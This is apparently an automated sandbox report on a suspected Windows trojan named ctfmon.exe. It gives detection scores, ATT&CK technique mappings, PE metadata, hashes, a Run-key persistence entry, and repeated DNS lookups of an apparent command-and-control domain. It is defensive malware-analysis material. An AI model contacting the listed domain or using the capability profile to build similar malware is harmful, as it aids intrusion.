Source: ctfmon.exe, 00000003.00000002.4563354300.00000000005A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: ctfmon.exe, 00000000.00000002.2182890205.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000000.00000003.2182151088.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000000.00000003.2182333508.0000000000740000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000000.00000002.2182890205.0000000000740000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000003.00000002.4563354300.0000000000605000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\ctfmon.exe

API call chain: ExitProcess graph end node

graph_3-19849

Source: C:\Users\user\Desktop\ctfmon.exe

0_2_004014B0

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_004140F6 SetUnhandledExceptionFilter,	0_2_004140F6
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00414108 SetUnhandledExceptionFilter,	0_2_00414108
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_004140F6 SetUnhandledExceptionFilter,	3_2_004140F6
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00414108 SetUnhandledExceptionFilter,	3_2_00414108

Source: C:\Users\user\Desktop\ctfmon.exe

Code function: 0_2_00414AE8 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_00414AE8

Source: C:\Users\user\Desktop\ctfmon.exe

Code function: 0_2_00403190 CreateEventW,GetComputerNameW,gethostname,gethostbyname,timeGetTime,GetNativeSystemInfo,GetVersionExW,GetVersionExW,GetVersionExW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,

0_2_00403190

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: cmd.exe		0_2_00403DB0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: cmd.exe		3_2_00403DB0

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00404AD0 WSAStartup,htons,htons,htons,socket,bind,listen,select,select,accept,select,select,closesocket,closesocket,closesocket,closesocket,recv,closesocket,closesocket,closesocket,closesocket,		0_2_00404AD0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00404AD0 WSAStartup,htons,htons,htons,socket,bind,listen,select,select,accept,select,select,closesocket,closesocket,closesocket,closesocket,recv,closesocket,closesocket,closesocket,closesocket,		3_2_00404AD0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Process Injection	11 Virtualization/Sandbox Evasion	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ctfmon.exe	16%	Virustotal		Browse
ctfmon.exe	34%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://mircroupdata.dynamic-dns.net/item.asp?spm=xx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mircroupdata.dynamic-dns.net	127.0.0.1	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mircroupdata.dynamic-dns.net/item.asp?spm=xx	ctfmon.exe, 00000003.00000002.4563354300.0000000000605000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581370
Start date and time:	2024-12-27 14:12:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ctfmon.exe
Detection:	MAL
Classification:	mal52.winEXE@2/0@16/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 86 Number of non-executed functions: 259
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.190.177.83, 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:13:00	API Interceptor	11181451x Sleep call for process: ctfmon.exe modified
14:13:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon.exe C:\Users\user\Desktop\ctfmon.exe
14:13:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon.exe C:\Users\user\Desktop\ctfmon.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	wce.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	atw3.dll	Get hash	malicious	Gozi, Ursnif	Browse	192.229.221.95
	setup.msi	Get hash	malicious	Unknown	Browse	192.229.221.95
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	V2s8yjvIJw.exe	Get hash	malicious	Iris Stealer	Browse	192.229.221.95
	k6olCJyvIj.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	G6xnfES308.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	XM6cn2uNux.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	bG89JAQXz2.exe	Get hash	malicious	LummaC	Browse	192.229.221.95

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.354684715897396
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ctfmon.exe
File size:	252'928 bytes
MD5:	e93fc4c159d07f6bfc246c10e6149ef8
SHA1:	5cd471e675ee61296a0aa0ce842835e710025b65
SHA256:	184b00a27e5b28089f7061ab3f92d2d4edafae37d33fb9f97af81d3b5cbdb559
SHA512:	b3f3be44cf1f610de87f58496320e61ab79e69342b1febf93fc1a52880893cbad074ed13ccc38265449c2e2e7628d87f89b444137dfd2bbce2f1ba8e43b66ea8
SSDEEP:	3072:A1f8f6G8CA9f34u/TzY2gj4EHRormwPnBvAMv4SOJwA6ctTBfC9o2x3hhfmf:+feLA9f340I2gjH+rmwPWjwAtTBc3D
TLSH:	7034AE1273E0CCB3D65601714DE59BBAF3BABA110B228A4773845F1DDC325E1EB36256
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v...............4......V.......}...............j7..................................................1...}........4......R......

File Icon


Icon Hash:	32fa7c1ea733b194

Static PE Info

General

Entrypoint:	0x40d029
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x525B90B6 [Mon Oct 14 06:35:34 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	634939b9007ba01c938016f96157c4a5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0042ED30h
push 00410450h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [0042C228h]
xor edx, edx
mov dl, ah
mov dword ptr [0053F680h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0053F67Ch], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0053F678h], ecx
shr eax, 10h
mov dword ptr [0053F674h], eax
push 00000001h
call 00007FCC00BCCBB9h
pop ecx
test eax, eax
jne 00007FCC00BC985Ah
push 0000001Ch
call 00007FCC00BC9917h
pop ecx
call 00007FCC00BCC964h
test eax, eax
jne 00007FCC00BC985Ah
push 00000010h
call 00007FCC00BC9906h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007FCC00BCC792h
call 00007FCC00BCC6ECh
mov dword ptr [00540ED4h], eax
call 00007FCC00BCC575h
mov dword ptr [0053F668h], eax
call 00007FCC00BCC342h
call 00007FCC00BCC285h
call 00007FCC00BCA4DEh
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [0042C0E0h]
call 00007FCC00BCC229h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007FCC00BC9858h
movzx eax, word ptr [ebp-2Ch]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[C++] VS98 (6.0) build 8168
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x35e58	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x142000	0x2130	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2c000	0x658	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2ac23	0x2ae00	8ff9de624b732405f1f9db731eb2bb7d	False	0.5927933673469388	COM executable for DOS	6.635464677774594	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2c000	0xbf38	0xc000	2b7a5f67a02fd719c3f105abeff28bb5	False	0.4624430338541667	data	5.592042341494126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x38000	0x109a08	0x4800	78f45c4a612e94c45b13ffd60238d233	False	0.1918402777777778	data	2.867400536704079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x142000	0x2130	0x2200	d1f70376cfe6a43113860d5e2b9748c2	False	0.3831571691176471	data	4.784631023612771	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x142b98	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Chinese	China	0.4805194805194805
RT_CURSOR	0x142cd0	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Chinese	China	0.7
RT_BITMAP	0x142db0	0x5e4	Device independent bitmap graphic, 70 x 39 x 4, image size 1404	Chinese	China	0.34615384615384615
RT_BITMAP	0x143480	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Chinese	China	0.44565217391304346
RT_BITMAP	0x143538	0x16c	Device independent bitmap graphic, 39 x 13 x 4, image size 260	Chinese	China	0.28296703296703296
RT_BITMAP	0x1436a8	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Chinese	China	0.37962962962962965
RT_ICON	0x142580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.46959459459459457
RT_DIALOG	0x1426c0	0x9a	data	English	United States	0.6298701298701299
RT_DIALOG	0x142760	0x84	data	English	United States	0.6666666666666666
RT_DIALOG	0x143398	0xe2	data	Chinese	China	0.6637168141592921
RT_STRING	0x1437f0	0x46	data	English	United States	0.6571428571428571
RT_STRING	0x143838	0x50	data	Chinese	China	0.85
RT_STRING	0x143888	0x2c	data	Chinese	China	0.5909090909090909
RT_STRING	0x1438b8	0x78	data	Chinese	China	0.925
RT_STRING	0x143930	0x1c4	data	Chinese	China	0.8141592920353983
RT_STRING	0x143c80	0x12a	data	Chinese	China	0.5201342281879194
RT_STRING	0x143b38	0x146	data	Chinese	China	0.6288343558282209
RT_STRING	0x143af8	0x40	data	Chinese	China	0.65625
RT_STRING	0x1440a0	0x64	data	Chinese	China	0.73
RT_STRING	0x143db0	0x1d8	data	Chinese	China	0.6758474576271186
RT_STRING	0x143f88	0x114	data	Chinese	China	0.6376811594202898
RT_STRING	0x144108	0x24	data	Chinese	China	0.4444444444444444
RT_GROUP_CURSOR	0x142d88	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China	1.0
RT_GROUP_ICON	0x1426a8	0x14	data	English	United States	1.15
RT_VERSION	0x1427e8	0x3ac	data	English	United States	0.4723404255319149

Imports

DLL	Import
KERNEL32.dll	GetVolumeInformationW, GetFullPathNameW, GetTickCount, GetFileAttributesW, GetFileTime, GetStartupInfoW, ExitProcess, RtlUnwind, HeapFree, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, GetTimeZoneInformation, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, SetStdHandle, LCMapStringA, LCMapStringW, IsBadWritePtr, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetCPInfo, GetStringTypeA, GetStringTypeW, CompareStringA, CompareStringW, GetACP, GetOEMCP, SetEnvironmentVariableA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, FindResourceA, GlobalAddAtomA, GetProfileStringA, GetCurrentProcess, DuplicateHandle, SetErrorMode, FileTimeToLocalFileTime, FileTimeToSystemTime, GetThreadLocale, SizeofResource, GetProcessVersion, WritePrivateProfileStringW, GlobalFlags, lstrcmpiW, lstrcpynW, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalAlloc, FormatMessageW, LocalFree, FindNextFileW, FindFirstFileW, FindClose, MulDiv, SetLastError, InterlockedIncrement, InterlockedDecrement, GetModuleHandleA, LoadLibraryA, lstrlenA, MultiByteToWideChar, GetVersion, lstrcatW, GlobalAddAtomW, GlobalFindAtomW, lstrcpyW, GetModuleHandleW, GlobalUnlock, GlobalFree, LockResource, FindResourceW, LoadResource, GetModuleFileNameW, GlobalLock, lstrcmpW, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, lstrcmpiA, lstrlenW, GetCurrentThread, GetCurrentThreadId, GetCommandLineW, GetCommandLineA, WideCharToMultiByte, CreateFileW, GetFileSize, SetFilePointer, CreatePipe, CreateProcessW, PeekNamedPipe, ReadFile, WriteFile, GetLogicalDrives, GetDriveTypeA, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetComputerNameW, GetVersionExW, OpenProcess, TerminateProcess, CloseHandle, DeleteFileW, VirtualAlloc, LoadLibraryW, GetProcAddress, FreeLibrary, CreateEventW, WaitForSingleObject, ResetEvent, GetLastError, CreateThread, SetEvent, GetModuleFileNameA, Sleep
USER32.dll	RegisterClipboardFormatW, PostThreadMessageW, UpdateWindow, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, GetSysColor, SetFocus, AdjustWindowRectEx, ScreenToClient, CopyRect, GetTopWindow, IsChild, GetCapture, WinHelpW, wsprintfW, GetClassInfoW, RegisterClassW, GetMenu, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextW, GetDlgCtrlID, DefWindowProcW, CreateWindowExW, SetPropW, UnhookWindowsHookEx, GetPropW, CallWindowProcW, RemovePropW, GetMessageTime, GetMessagePos, InflateRect, SetForegroundWindow, SetWindowLongW, RegisterWindowMessageW, OffsetRect, IntersectRect, SystemParametersInfoW, GetWindowPlacement, GetWindowRect, MapDialogRect, SetWindowPos, SetWindowContextHelpId, EndDialog, SetActiveWindow, IsWindow, MessageBeep, DestroyWindow, GetDlgItem, GetMenuCheckMarkDimensions, LoadBitmapW, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetFocus, GetNextDlgTabItem, GetMessageW, TranslateMessage, DispatchMessageW, GetActiveWindow, LoadIconW, SendMessageW, AppendMenuW, GetSystemMenu, UnregisterClassW, GetWindowTextLengthA, HideCaret, ShowCaret, GetKeyState, CallNextHookEx, ValidateRect, IsWindowVisible, PeekMessageW, GetCursorPos, SetWindowsHookExW, GetParent, GetLastActivePopup, IsWindowEnabled, GetWindowLongW, MessageBoxW, SetCursor, PostQuitMessage, PostMessageW, CharUpperW, InvalidateRect, GetForegroundWindow, EnableWindow, IsIconic, ExcludeUpdateRgn, GetWindowTextA, DrawTextA, DrawFocusRect, GetClassInfoA, DefDlgProcA, DefWindowProcA, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, DrawIcon, GetClientRect, GetSystemMetrics, SetRect, CopyAcceleratorTableW, CharNextW, GetSysColorBrush, PtInRect, GetClassNameW, CreateDialogIndirectParamW, GetNextDlgGroupItem, GetDesktopWindow, LoadCursorW, GrayStringW, DrawTextW, TabbedTextOutW, EndPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, DestroyMenu, LoadStringW, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, GetWindow, BeginPaint
GDI32.dll	SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, DeleteObject, SetMapMode, GetDeviceCaps, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, PtVisible, RectVisible, TextOutW, ExtTextOutW, Escape, GetTextColor, GetBkColor, DPtoLP, LPtoDP, GetMapMode, PatBlt, SetBkMode, GetStockObject, SelectObject, RestoreDC, SaveDC, DeleteDC, GetObjectW, SetBkColor, SetTextColor, GetClipBox, CreateDIBitmap, ExtTextOutA, GetTextExtentPointA, BitBlt, CreateCompatibleDC, CreateBitmap
comdlg32.dll	GetFileTitleW
WINSPOOL.DRV	ClosePrinter, DocumentPropertiesW, OpenPrinterW
ADVAPI32.dll	RegSetValueExA, RegSetValueExW, RegOpenKeyExW, RegCreateKeyExW, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
SHELL32.dll	ShellExecuteW
COMCTL32.dll
oledlg.dll	OleUIBusyW
ole32.dll	CoRegisterMessageFilter, CoRevokeClassObject, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CoTaskMemAlloc, CoTaskMemFree, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, OleFlushClipboard, OleIsCurrentClipboard
OLEPRO32.DLL
OLEAUT32.dll	SysAllocString, VariantChangeType, VariantCopy, VariantTimeToSystemTime, VariantClear, SysAllocStringLen, SysFreeString, SysStringLen
WININET.dll	InternetCloseHandle, InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpAddRequestHeadersA, HttpSendRequestA, InternetReadFile
WINMM.dll	timeGetTime
PSAPI.DLL	GetModuleFileNameExW, EnumProcesses, EnumProcessModules
iphlpapi.dll	GetAdaptersInfo
WS2_32.dll	bind, listen, accept, select, recv, gethostname, htons, inet_addr, gethostbyname, WSAGetLastError, WSAStartup, closesocket, send, connect, socket

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:13:02.615452051 CET	61704	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:13:03.600874901 CET	61704	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:13:03.997077942 CET	53	61704	1.1.1.1	192.168.2.6
Dec 27, 2024 14:13:03.997112036 CET	53	61704	1.1.1.1	192.168.2.6
Dec 27, 2024 14:13:33.946146011 CET	56526	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:13:34.944216013 CET	56526	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:13:35.218943119 CET	53	56526	1.1.1.1	192.168.2.6
Dec 27, 2024 14:13:35.218956947 CET	53	56526	1.1.1.1	192.168.2.6
Dec 27, 2024 14:14:05.814862013 CET	63133	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:14:06.803857088 CET	63133	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:14:07.058629990 CET	53	63133	1.1.1.1	192.168.2.6
Dec 27, 2024 14:14:07.058650970 CET	53	63133	1.1.1.1	192.168.2.6
Dec 27, 2024 14:14:37.665721893 CET	51450	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:14:38.679044008 CET	51450	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:14:39.127676964 CET	53	51450	1.1.1.1	192.168.2.6
Dec 27, 2024 14:14:39.127697945 CET	53	51450	1.1.1.1	192.168.2.6
Dec 27, 2024 14:15:10.776367903 CET	56341	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:15:11.788547039 CET	56341	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:15:12.032366037 CET	53	56341	1.1.1.1	192.168.2.6
Dec 27, 2024 14:15:12.032439947 CET	53	56341	1.1.1.1	192.168.2.6
Dec 27, 2024 14:15:42.650819063 CET	62929	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:15:43.664336920 CET	62929	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:15:43.902530909 CET	53	62929	1.1.1.1	192.168.2.6
Dec 27, 2024 14:15:43.902556896 CET	53	62929	1.1.1.1	192.168.2.6
Dec 27, 2024 14:16:14.262927055 CET	50639	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:16:15.273318052 CET	50639	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:16:15.416356087 CET	53	50639	1.1.1.1	192.168.2.6
Dec 27, 2024 14:16:15.416402102 CET	53	50639	1.1.1.1	192.168.2.6
Dec 27, 2024 14:16:44.901200056 CET	52424	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:16:45.898597002 CET	52424	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:16:46.155421972 CET	53	52424	1.1.1.1	192.168.2.6
Dec 27, 2024 14:16:46.155436993 CET	53	52424	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 14:13:02.615452051 CET	192.168.2.6	1.1.1.1	0x1aed	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:03.600874901 CET	192.168.2.6	1.1.1.1	0x1aed	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:33.946146011 CET	192.168.2.6	1.1.1.1	0x26dc	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:13:34.944216013 CET	192.168.2.6	1.1.1.1	0x26dc	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:05.814862013 CET	192.168.2.6	1.1.1.1	0xd85e	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:06.803857088 CET	192.168.2.6	1.1.1.1	0xd85e	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:37.665721893 CET	192.168.2.6	1.1.1.1	0x1008	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:14:38.679044008 CET	192.168.2.6	1.1.1.1	0x1008	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:10.776367903 CET	192.168.2.6	1.1.1.1	0x305b	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:11.788547039 CET	192.168.2.6	1.1.1.1	0x305b	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:42.650819063 CET	192.168.2.6	1.1.1.1	0xb5ad	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:15:43.664336920 CET	192.168.2.6	1.1.1.1	0xb5ad	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:14.262927055 CET	192.168.2.6	1.1.1.1	0xfc38	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:15.273318052 CET	192.168.2.6	1.1.1.1	0xfc38	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:44.901200056 CET	192.168.2.6	1.1.1.1	0xe938	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:16:45.898597002 CET	192.168.2.6	1.1.1.1	0xe938	Standard query (0)	mircroupdata.dynamic-dns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
